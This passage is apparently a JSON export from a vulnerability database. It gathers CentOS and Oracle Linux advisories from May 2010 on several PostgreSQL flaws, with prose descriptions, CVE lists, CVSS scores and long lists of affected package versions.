overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. Running\nPostgreSQL instances must be restarted (\"service rhdb restart\") for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016642.html\n\n**Affected packages:**\nrh-postgresql\nrh-postgresql-contrib\nrh-postgresql-devel\nrh-postgresql-docs\nrh-postgresql-jdbc\nrh-postgresql-libs\nrh-postgresql-pl\nrh-postgresql-python\nrh-postgresql-server\nrh-postgresql-tcl\nrh-postgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0427.html", "edition": 2, "reporter": "CentOS Project", "published": "2010-05-21T23:01:26", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "rh security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-4136"], "modified": "2010-05-21T23:08:29", "href": "http://lists.centos.org/pipermail/centos-announce/2010-May/016640.html", "id": "CESA-2010:0427", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:33", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0429.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-test", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-server", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-8.1.21-1.el5_5.1.src.rpm", "packageName": "postgresql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-8.1.21-1.el5_5.1.src.rpm", "packageName": "postgresql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-docs", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-server", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-python", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-docs", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-contrib", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-libs", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-pl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-pl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-python", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-libs", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-libs", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-test", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-contrib", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0429\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 8.1.21. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016650.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016652.html\n\n**Affected packages:**\npostgresql\npostgresql-contrib\npostgresql-devel\npostgresql-docs\npostgresql-libs\npostgresql-pl\npostgresql-python\npostgresql-server\npostgresql-tcl\npostgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0429.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-05-28T11:45:13", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "postgresql security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1975", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-4136"], "modified": "2010-05-28T11:45:13", "href": "http://lists.centos.org/pipermail/centos-announce/2010-May/016650.html", "id": "CESA-2010:0429", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:53", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0428.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "any", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "any", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0428\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 7.4.29. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-May/016646.html\n\n**Affected packages:**\npostgresql\npostgresql-contrib\npostgresql-devel\npostgresql-docs\npostgresql-jdbc\npostgresql-libs\npostgresql-pl\npostgresql-python\npostgresql-server\npostgresql-tcl\npostgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0428.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-05-21T23:22:02", "title": "postgresql security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1975", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-4136"], "modified": "2010-05-21T23:23:21", "href": "http://lists.centos.org/pipermail/centos-announce/2010-May/016645.html", "id": "CESA-2010:0428", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:47:17", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-docs-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-jdbc-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-jdbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-jdbc-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-jdbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-test-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-contrib-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-tcl-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "src", "packageFilename": "rh-postgresql-7.3.21-3.src.rpm", "packageName": "rh-postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "src", "packageFilename": "rh-postgresql-7.3.21-3.src.rpm", "packageName": "rh-postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-libs-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-libs-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-pl-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-pl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-7.3.21-3.i386.rpm", "packageName": "rh-postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-server-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-test-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-devel-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-libs-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-python-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-devel-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-docs-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "x86_64", "packageFilename": "rh-postgresql-tcl-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-server-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-contrib-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-python-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "7.3.21-3", "arch": "i386", "packageFilename": "rh-postgresql-pl-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-pl", "operator": "lt"}], "description": "[7.3.21-3]\n- Fix CVE-2010-1169, CVE-2010-1170, CVE-2009-4136, CVE-2010-0733, CVE-2010-0442\n via back-ports of upstream patches for Postgres 7.4\nResolves: #589541", "edition": 3, "reporter": "Oracle", "published": "2010-05-19T00:00:00", "title": "postgresql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-4136"], "modified": "2010-05-19T00:00:00", "id": "ELSA-2010-0427", "href": "http://linux.oracle.com/errata/ELSA-2010-0427.html", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:37:39", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": 